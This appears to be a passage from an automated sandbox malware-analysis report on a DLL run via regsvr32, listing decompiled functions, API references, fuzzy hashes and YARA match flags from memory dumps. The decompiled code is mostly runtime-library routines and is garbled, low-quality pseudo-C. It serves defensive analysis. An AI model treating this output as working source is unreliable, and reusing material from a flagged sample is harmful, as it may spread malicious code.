0x7ffd2b071ae4
0x7ffd2b071aea
0x7ffd2b071af2
0x7ffd2b071afc
0x7ffd2b071b07
0x7ffd2b071b0c
0x7ffd2b071b18
0x7ffd2b071b1e
0x7ffd2b071b36
0x7ffd2b071b3b
0x7ffd2b071b43
0x7ffd2b071b4c
0x7ffd2b071b4e
0x7ffd2b071b51
0x7ffd2b071b5f
0x7ffd2b071b72
0x7ffd2b071b7c
0x7ffd2b071b7e
0x7ffd2b071b8a
0x7ffd2b071b92
0x7ffd2b071b99
0x7ffd2b071ba2
0x7ffd2b071bb7
0x7ffd2b071bbc
0x7ffd2b071bbe
0x7ffd2b071bc4
0x7ffd2b071bc7
0x7ffd2b071bce
0x7ffd2b071bd3
0x7ffd2b071bd4
0x7ffd2b071bda
0x7ffd2b071bdd
0x7ffd2b071be4
0x7ffd2b071be9
0x7ffd2b071c0f

APIs

_getptd.LIBCMT ref: 00007FFD2B071A0E

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

Part of subcall function 00007FFD2B066870: _errno.LIBCMT ref: 00007FFD2B066888
Part of subcall function 00007FFD2B066870: _invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B066894

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 1050512615-0
Opcode ID: 563c8f68154ae00a86a84019f6f1b1bf0a5fce56bde51bd677902d8146a06199
Instruction ID: dda1ebb2852bddf39f0c098b3e56e98f6c145faa679f4ff5167794d4dac5b4f5
Opcode Fuzzy Hash: 563c8f68154ae00a86a84019f6f1b1bf0a5fce56bde51bd677902d8146a06199
Instruction Fuzzy Hash: EB51CB21B0E68245FB569B21AF313BA9655FF86FC4F048031DE4D47AE9EEBCD445A380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012BFC Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

uL~X, xrefs: 0000000180012D21

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: uL~X
API String ID: 0-3492378280
Opcode ID: c6f392b216e178daac8f6a633078f7db2729c753e3f84ebd61764f51a21e6990
Instruction ID: d5a2a05253b25fa09d1f4a0a8e293cbf18d5238a569b4b52025f537a0d51a87a
Opcode Fuzzy Hash: c6f392b216e178daac8f6a633078f7db2729c753e3f84ebd61764f51a21e6990
Instruction Fuzzy Hash: 4D02E6B150560ACFDB98CF28C585ADE3BE0FF48318F414129FC0A9B294D774DA69DB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006668 Relevance: 1.6, Strings: 1, Instructions: 328COMMON

Download Yara Rule

Strings

7w, xrefs: 000000018000699A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 7w
API String ID: 0-1590570024
Opcode ID: fc178e956535ca2e047fc9e577a13a2a7fee3c1458e654fa024ae66ce9e8a0d9
Instruction ID: bcdf8af614ce119259372ddc2241b10d7dd4e42d3abf697d6c611332b7fae7fa
Opcode Fuzzy Hash: fc178e956535ca2e047fc9e577a13a2a7fee3c1458e654fa024ae66ce9e8a0d9
Instruction Fuzzy Hash: A0E10A71E0870E8FDB99DFA8C4566EEBBB2FB48354F008119D40AF6290D7749A09CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A9F0 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

#X, xrefs: 000000018001AE6C

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X
API String ID: 0-1684620495
Opcode ID: 6dc5db42fc19b6f7285259d344564077165a90bd868be6f0fe9dfe417e95ce79
Instruction ID: fb7b8c1edf22dcbd8321a170a1b4e40be69899bad680fec357304c9722582c29
Opcode Fuzzy Hash: 6dc5db42fc19b6f7285259d344564077165a90bd868be6f0fe9dfe417e95ce79
Instruction Fuzzy Hash: 8102B671505B888FEBB9CF28CC89BEB7BA1FB44306F10551AD84A9E294DFB45644CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B065D68 Relevance: 1.6, Strings: 1, Instructions: 320
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 61%

			E00007FFD7FFD2B065D68(void* __eflags, long long __rbx, signed int __rdx, void* __r8, signed int* __r9) {
				void* _t115;
				signed char _t117;
				signed int _t121;
				signed int _t128;
				void* _t138;
				signed long long _t139;
				signed long long _t179;
				unsigned long long _t180;
				signed long long _t194;
				signed long long _t199;
				signed long long _t200;
				signed long long _t203;
				signed long long _t207;
				signed long long _t211;
				signed long long _t215;
				unsigned long long _t219;
				unsigned long long _t223;
				unsigned long long _t227;
				unsigned long long _t231;
				unsigned long long _t235;
				signed long long _t242;
				signed long long _t248;
				signed long long _t252;
				signed long long _t256;
				unsigned long long _t260;
				unsigned long long _t264;
				unsigned long long _t268;
				unsigned long long _t272;
				unsigned long long _t276;
				signed long long _t281;
				signed long long _t287;
				signed long long _t293;
				signed long long _t295;
				signed long long _t296;
				void* _t305;
				void* _t307;
				signed long long _t308;
				signed long long _t311;
				signed long long _t327;
				signed long long _t338;
				signed long long _t340;

				_t138 = _t307;
				 *((long long*)(_t138 + 8)) = __rbx;
				_push(_t338);
				_push(_t340);
				_t305 = _t138 - 0xf28;
				_t308 = _t307 - 0xff0;
				asm("movaps [eax-0x48], xmm6");
				asm("movaps [eax-0x58], xmm7");
				asm("inc esp");
				_t139 =  *0x2b0c70a0; // 0xf787487f4682
				 *(_t305 + 0xeb0) = _t139 ^ _t308;
				r15d = 0x3ff;
				asm("movsd [esp], xmm0");
				 *(_t305 - 0x58) =  *(_t305 - 0x58) & 0x00000000;
				_t327 =  *_t308 & 0xffffffff | 0x00000000;
				r11d = r11d & 0x000007ff;
				r11d = r11d - r15d;
				r11d = r11d - __rdx + __rdx * 4 + __rdx + __rdx * 4;
				_t311 = __rdx + 0x12;
				_t203 =  *(0x2b0c70b0 + _t311 * 8) * _t327;
				_t248 =  *(0x2b0c70b0 + _t311 * 8 - 8) * _t327 + (_t203 >> 0xa);
				 *(_t305 - 0x60) = _t203 & _t340;
				_t207 =  *(0x2b0c70b0 + _t311 * 8 - 0x10) * _t327 + (_t248 >> 0xa);
				 *(_t305 - 0x68) = _t248 & _t340;
				_t252 =  *(0x2b0c70b0 + _t311 * 8 - 0x18) * _t327 + (_t207 >> 0xa);
				 *(_t305 - 0x70) = _t207 & _t340;
				_t211 =  *(0x2b0c70b0 + _t311 * 8 - 0x20) * _t327 + (_t252 >> 0xa);
				 *(_t305 - 0x78) = _t252 & _t340;
				_t256 =  *(0x2b0c70b0 + _t311 * 8 - 0x28) * _t327 + (_t211 >> 0xa);
				 *(_t305 - 0x80) = _t211 & _t340;
				_t215 =  *(0x2b0c70b0 + _t311 * 8 - 0x30) * _t327 + (_t256 >> 0xa);
				 *(_t308 + 0x78) = _t256 & _t340;
				_t260 =  *(0x2b0c70b0 + _t311 * 8 - 0x38) * _t327 + (_t215 >> 0xa);
				 *(_t308 + 0x70) = _t215 & _t340;
				 *(_t308 + 0x68) = _t260 & _t340;
				_t219 =  *(0x2b0c70b0 + _t311 * 8 - 0x40) * _t327 + (_t260 >> 0xa);
				 *(_t308 + 0x60) = _t219 & _t340;
				_t264 =  *(0x2b0c70b0 + _t311 * 8 - 0x48) * _t327 + (_t219 >> 0xa);
				 *(_t308 + 0x58) = _t264 & _t340;
				_t223 =  *(0x2b0c70b0 + _t311 * 8 - 0x50) * _t327 + (_t264 >> 0xa);
				 *(_t308 + 0x50) = _t223 & _t340;
				_t268 =  *(0x2b0c70b0 + _t311 * 8 - 0x58) * _t327 + (_t223 >> 0xa);
				 *(_t308 + 0x48) = _t268 & _t340;
				_t227 =  *(0x2b0c70b0 + _t311 * 8 - 0x60) * _t327 + (_t268 >> 0xa);
				 *(_t308 + 0x40) = _t227 & _t340;
				_t272 =  *(0x2b0c70b0 + _t311 * 8 - 0x68) * _t327 + (_t227 >> 0xa);
				 *(_t308 + 0x38) = _t272 & _t340;
				_t231 =  *(0x2b0c70b0 + _t311 * 8 - 0x70) * _t327 + (_t272 >> 0xa);
				 *(_t308 + 0x30) = _t231 & _t340;
				_t276 =  *(0x2b0c70b0 + _t311 * 8 - 0x78) * _t327 + (_t231 >> 0xa);
				 *(_t308 + 0x28) = _t276 & _t340;
				_t235 =  *(0x2b0c70b0 + _t311 * 8 - 0x80) * _t327 + (_t276 >> 0xa);
				 *(_t308 + 0x20) = _t235 & _t340;
				_t179 =  *(0x2b0c70b0 + _t311 * 8 - 0x88) * _t327 + (_t235 >> 0xa);
				_t180 = _t179 >> 0xa;
				_t199 = _t179 & _t340;
				_t281 =  *(0x2b0c70b0 + _t311 * 8 - 0x90) * _t327 + _t180 & _t340;
				 *(_t308 + 0x18) = _t199;
				 *(_t308 + 0x10) = _t281;
				_t88 = _t180 - 1; // 0x9
				r14d = 1;
				_t121 = (0x66666667 * r11d >> 0x00000020 >> 0x00000002) + (0x66666667 * r11d >> 0x00000020 >> 0x00000002 >> 0x0000001f) & 0x00000007;
				r9d = r14d;
				_t117 = 0xa - r11d;
				_t128 = _t121 & r14d;
				if (__eflags == 0) goto 0x2b066092;
				_t200 =  !_t199;
				 *__r9 = (_t121 >> 0x00000001) + r14d & 0x00000003;
				_t287 = ((_t281 << 0x0000000a | _t199) >> _t88 << _t117) - _t338 & _t200;
				if (_t287 - 0 >= 0) goto 0x2b066085;
				r9d = r9d + r14d;
				if (( !( *(_t308 + 0x20)) & _t340 | _t287 << 0x0000000a) - 0 < 0) goto 0x2b066063;
				goto 0x2b0660c7;
				 *__r9 = r14d >> 1;
				_t293 = (_t338 << _t117) - _t338 & _t200;
				if (_t293 - 0 >= 0) goto 0x2b0660bf;
				r9d = r9d + r14d;
				_t295 = _t293 << 0x0000000a |  *(_t308 + 0x20);
				if (_t295 - 0 < 0) goto 0x2b0660ac;
				r11d = r11d - 0x4ffe3ae7c66e0;
				r11d = r11d + 0x34;
				goto 0x2b0660f3;
				r11d = r11d + r14d;
				_t296 = _t295 >> 1;
				if (_t296 - 0 >= 0) goto 0x2b0660da;
				_t242 = r11d;
				_t99 = _t242 + 0x3ff; // 0x100000000003fe
				if (_t128 == 0) goto 0x2b066127;
				 *_t308 = _t99 << 0x00000034 | _t296 & 0xffffffff | 0x00000000;
				_t100 = _t242 + 0x3ca; // 0x100000000003c9
				asm("repne inc esp");
				_t194 = _t100 << 0x34;
				 *_t308 = _t194;
				asm("movsd xmm0, [esp]");
				 *_t308 = (_t295 << 0x0000003f |  *(_t308 + 0x18 + r9d * 8) << 0x00000036 >> 0x00000001) >> 0x0000000c | _t194;
				asm("movsd xmm7, [esp]");
				asm("subsd xmm7, xmm0");
				if (_t128 == 0) goto 0x2b066167;
				asm("mulsd xmm7, [0x1c62b]");
				goto 0x2b06616f;
				asm("mulsd xmm7, [0x1c619]");
				asm("mulsd xmm7, [0x1c5f1]");
				asm("repne inc esp");
				asm("inc cx");
				asm("inc cx");
				asm("repne inc esp");
				 *_t308 =  *_t308 & 0xf8000000;
				asm("movsd xmm2, [esp]");
				asm("subsd xmm3, xmm2");
				asm("movapd xmm5, xmm2");
				asm("mulsd xmm6, [0x1c5b5]");
				asm("mulsd xmm2, [0x1c5bd]");
				asm("movapd xmm0, xmm3");
				asm("repne inc esp");
				asm("mulsd xmm5, [0x1c5a4]");
				asm("mulsd xmm0, [0x1c59c]");
				asm("mulsd xmm3, [0x1c59c]");
				asm("subsd xmm5, xmm6");
				asm("addsd xmm5, xmm0");
				asm("addsd xmm5, xmm2");
				asm("addsd xmm5, xmm3");
				asm("repne inc ecx");
				asm("movapd xmm0, xmm5");
				asm("addsd xmm0, xmm6");
				asm("subsd xmm6, xmm0");
				asm("repne inc ecx");
				asm("addsd xmm6, xmm5");
				asm("repne inc ecx");
				_t115 = E00007FFD7FFD2B064980(_t117,  *(_t305 + 0xeb0) ^ _t308, 0, (_t295 << 0x0000003f |  *(_t308 + 0x18 + r9d * 8) << 0x00000036 >> 0x00000001) >> 0x0000000c | _t194);
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ebp");
				return _t115;
			}

0x7ffd2b065d68
0x7ffd2b065d6b
0x7ffd2b065d76
0x7ffd2b065d78
0x7ffd2b065d7a
0x7ffd2b065d81
0x7ffd2b065d88
0x7ffd2b065d8c
0x7ffd2b065d90
0x7ffd2b065d95
0x7ffd2b065d9f
0x7ffd2b065da9
0x7ffd2b065db9
0x7ffd2b065dc2
0x7ffd2b065dd7
0x7ffd2b065de3
0x7ffd2b065df4
0x7ffd2b065e0c
0x7ffd2b065e12
0x7ffd2b065e1e
0x7ffd2b065e2d
0x7ffd2b065e38
0x7ffd2b065e47
0x7ffd2b065e52
0x7ffd2b065e61
0x7ffd2b065e6c
0x7ffd2b065e7b
0x7ffd2b065e86
0x7ffd2b065e95
0x7ffd2b065ea0
0x7ffd2b065eaf
0x7ffd2b065eba
0x7ffd2b065ecd
0x7ffd2b065ed0
0x7ffd2b065edb
0x7ffd2b065eed
0x7ffd2b065eff
0x7ffd2b065f08
0x7ffd2b065f1a
0x7ffd2b065f23
0x7ffd2b065f35
0x7ffd2b065f3e
0x7ffd2b065f50
0x7ffd2b065f59
0x7ffd2b065f6b
0x7ffd2b065f74
0x7ffd2b065f86
0x7ffd2b065f8f
0x7ffd2b065fa1
0x7ffd2b065faa
0x7ffd2b065fbc
0x7ffd2b065fc5
0x7ffd2b065fda
0x7ffd2b065fef
0x7ffd2b065ff5
0x7ffd2b065ffc
0x7ffd2b066004
0x7ffd2b06600a
0x7ffd2b06600f
0x7ffd2b066018
0x7ffd2b066021
0x7ffd2b066031
0x7ffd2b066034
0x7ffd2b066037
0x7ffd2b06603b
0x7ffd2b06603e
0x7ffd2b066042
0x7ffd2b06604b
0x7ffd2b066056
0x7ffd2b06605c
0x7ffd2b06606a
0x7ffd2b066083
0x7ffd2b066090
0x7ffd2b066094
0x7ffd2b06609f
0x7ffd2b0660a5
0x7ffd2b0660b4
0x7ffd2b0660b7
0x7ffd2b0660bd
0x7ffd2b0660d1
0x7ffd2b0660d4
0x7ffd2b0660d8
0x7ffd2b0660e0
0x7ffd2b0660f0
0x7ffd2b0660f6
0x7ffd2b0660f8
0x7ffd2b066108
0x7ffd2b066118
0x7ffd2b066127
0x7ffd2b06612f
0x7ffd2b066136
0x7ffd2b06613c
0x7ffd2b066140
0x7ffd2b066147
0x7ffd2b06614c
0x7ffd2b066150
0x7ffd2b066155
0x7ffd2b06615b
0x7ffd2b06615d
0x7ffd2b066165
0x7ffd2b066167
0x7ffd2b06616f
0x7ffd2b066177
0x7ffd2b06617d
0x7ffd2b066186
0x7ffd2b066191
0x7ffd2b06619a
0x7ffd2b06619e
0x7ffd2b0661a3
0x7ffd2b0661a7
0x7ffd2b0661ab
0x7ffd2b0661b3
0x7ffd2b0661bb
0x7ffd2b0661bf
0x7ffd2b0661c4
0x7ffd2b0661cc
0x7ffd2b0661d4
0x7ffd2b0661dc
0x7ffd2b0661e0
0x7ffd2b0661e4
0x7ffd2b0661e8
0x7ffd2b0661ec
0x7ffd2b0661f1
0x7ffd2b0661f5
0x7ffd2b0661f9
0x7ffd2b0661fd
0x7ffd2b066203
0x7ffd2b066207
0x7ffd2b066217
0x7ffd2b066228
0x7ffd2b06622d
0x7ffd2b066232
0x7ffd2b066245

Strings

gfff, xrefs: 00007FFD2B065DDE

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 6e8754b308ad9b1f697bf15cbe2c2a4225513a31ff3c778dee9321d51807d323
Instruction ID: c26d668e751d88408df2f202ac6388c85f2e1c4bc84f10552ef2236857036501
Opcode Fuzzy Hash: 6e8754b308ad9b1f697bf15cbe2c2a4225513a31ff3c778dee9321d51807d323
Instruction Fuzzy Hash: B2C1D6A3B15F854ADE05CF25A825369A399FB55BC0F00D732EE4D57B68EF3CE4458200

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C144 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

(EF4, xrefs: 000000018002C640

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (EF4
API String ID: 0-3036941264
Opcode ID: d030758ce60e971068ff74bdadf18ac8339fa3bd6f35d08c61a9e71d4c9f309d
Instruction ID: 8b5f89ef4a24fff570ae9c4094310d6232847ed88f3400130667ffe0c9cfa0ff
Opcode Fuzzy Hash: d030758ce60e971068ff74bdadf18ac8339fa3bd6f35d08c61a9e71d4c9f309d
Instruction Fuzzy Hash: C40268B5902748CFDB88CF28C68A59D7BF1FF49308F004129FC1A9A2A4D774D929CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800293B4 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

#X, xrefs: 0000000180029633

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X
API String ID: 0-1684620495
Opcode ID: c1e4ad5a732a0b02a5948bed507ed7c2c4c0a1ef3a7530e618f8ffb0e6a5abc9
Instruction ID: fef19a50ed0db9469055086572fe56d7e1246183f775c326acac8bb6deb143aa
Opcode Fuzzy Hash: c1e4ad5a732a0b02a5948bed507ed7c2c4c0a1ef3a7530e618f8ffb0e6a5abc9
Instruction Fuzzy Hash: 9DE1FE7150270CCBEB58DF28D68A69E3BE5FF58304F10412DFC5A8A2A1D774E928CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0779F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FFD7FFD2B0779F8(void* __ecx, void* __edx, long long __rbx, long long __rsi, long long __rbp, intOrPtr* __r8, intOrPtr _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _t11;
				void* _t30;
				int _t36;
				void* _t43;

				_t30 = _t43;
				 *((long long*)(_t30 + 0x10)) = __rbx;
				 *((long long*)(_t30 + 0x18)) = __rbp;
				 *((long long*)(_t30 + 0x20)) = __rsi;
				r9d = 2;
				asm("bts ecx, 0xa");
				if (GetLocaleInfoW(_t36, ??, ??) != 0) goto 0x2b077a3c;
				goto 0x2b077a73;
				if (__ecx == _a8) goto 0x2b077a6e;
				if (__edx == 0) goto 0x2b077a6e;
				_t11 =  *((intOrPtr*)( *__r8));
				if (_t11 - 0x41 < 0) goto 0x2b077a57;
				if (_t11 - 0x5a <= 0) goto 0x2b077a5d;
				if (_t11 - 0x61 - 0x19 > 0) goto 0x2b077a61;
				goto 0x2b077a4a;
				if (1 == E00007FFD7FFD2B0653B0(_t11 - 0x61,  *__r8)) goto 0x2b077a38;
				return 1;
			}

0x7ffd2b0779f8
0x7ffd2b0779fb
0x7ffd2b0779ff
0x7ffd2b077a03
0x7ffd2b077a1d
0x7ffd2b077a23
0x7ffd2b077a36
0x7ffd2b077a3a
0x7ffd2b077a40
0x7ffd2b077a44
0x7ffd2b077a4a
0x7ffd2b077a51
0x7ffd2b077a55
0x7ffd2b077a5b
0x7ffd2b077a5f
0x7ffd2b077a6c
0x7ffd2b077a87

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FFD2B077A2C

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d70b47ea487775fd8fd1ebcd2a2123ab96aa4f68891ad401a68dd50162b2f140
Instruction ID: c70ef133c9846117c6d6298e84a1c10f4307bff4a54ea9ece002051b7e9e753e
Opcode Fuzzy Hash: d70b47ea487775fd8fd1ebcd2a2123ab96aa4f68891ad401a68dd50162b2f140
Instruction Fuzzy Hash: 9C012B32B0968296F7260B15A9601BD67A0FBC6FC4F584071DB4D47366CEACFA42A380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077EC8 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFD7FFD2B077EC8(void* __rax, intOrPtr* __rcx) {
				void* _t24;
				void* _t25;
				int _t27;
				void* _t41;

				_t41 = __rax;
				_t25 = E00007FFD7FFD2B0653B0(_t24,  *__rcx);
				 *(__rcx + 0x18) = 0 | _t41 == 0x00000003;
				E00007FFD7FFD2B0653B0(_t25,  *((intOrPtr*)(__rcx + 8)));
				 *(__rcx + 0x20) =  *(__rcx + 0x20) & 0x00000000;
				 *(__rcx + 0x1c) = 0 | _t41 == 0x00000003;
				if ( *(__rcx + 0x18) == 0) goto 0x2b077f40;
				 *((intOrPtr*)(__rcx + 0x14)) = 2;
				_t27 = EnumSystemLocalesA(??, ??);
				if (( *(__rcx + 0x10) & 0x00000100) == 0) goto 0x2b077f36;
				if (( *(__rcx + 0x10) & 0x00000200) == 0) goto 0x2b077f36;
				if (( *(__rcx + 0x10) & 0x00000007) != 0) goto 0x2b077f3a;
				 *(__rcx + 0x10) =  *(__rcx + 0x10) & 0x00000000;
				return _t27;
			}

0x7ffd2b077ec8
0x7ffd2b077ed4
0x7ffd2b077ee6
0x7ffd2b077ee9
0x7ffd2b077ef7
0x7ffd2b077eff
0x7ffd2b077f02
0x7ffd2b077f09
0x7ffd2b077f18
0x7ffd2b077f25
0x7ffd2b077f2e
0x7ffd2b077f34
0x7ffd2b077f36
0x7ffd2b077f3f

APIs

EnumSystemLocalesA.KERNEL32 ref: 00007FFD2B077F18

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 471cc843b4037bc3d9107caf78c3520e798c42812e0debc17b57e4e5d15a5263
Instruction ID: acd09fb6dfa8490146697bcce8e51c618803032a74ecbeb49233efedb8549d50
Opcode Fuzzy Hash: 471cc843b4037bc3d9107caf78c3520e798c42812e0debc17b57e4e5d15a5263
Instruction Fuzzy Hash: 66115172B0A6064BF71A9B31CB653BA7291EB55B49F144435C60D012E6CBFCE594F6C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077F60 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD2B077F60(void* __rax, intOrPtr* __rcx) {
				void* _t11;
				int _t13;
				signed int _t15;
				void* _t22;

				_t22 = __rax;
				E00007FFD7FFD2B0653B0(_t11,  *__rcx);
				_t15 = 0 | _t22 == 0x00000003;
				 *(__rcx + 0x18) = _t15;
				if (_t15 == 0) goto 0x2b077fab;
				 *((intOrPtr*)(__rcx + 0x14)) = 2;
				_t13 = EnumSystemLocalesA(??, ??);
				if (( *(__rcx + 0x10) & 0x00000004) != 0) goto 0x2b077fa5;
				 *(__rcx + 0x10) =  *(__rcx + 0x10) & 0x00000000;
				return _t13;
			}

0x7ffd2b077f60
0x7ffd2b077f6c
0x7ffd2b077f77
0x7ffd2b077f7a
0x7ffd2b077f7f
0x7ffd2b077f86
0x7ffd2b077f95
0x7ffd2b077f9f
0x7ffd2b077fa1
0x7ffd2b077faa

APIs

EnumSystemLocalesA.KERNEL32 ref: 00007FFD2B077F95

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 79f756618921ec9bbb1f45445aab9d59cf9f059d4e44cede83f7a7bf555376e6
Instruction ID: 488e563475069aefa71a7a1837bfcc2792a03b29bdc429d47eb612a112c9744e
Opcode Fuzzy Hash: 79f756618921ec9bbb1f45445aab9d59cf9f059d4e44cede83f7a7bf555376e6
Instruction Fuzzy Hash: 5CF0A4B2F0A9064BF7168B31CB653B96391EB96B44F188035C60D422E6CEFCE595B2C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077E88 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

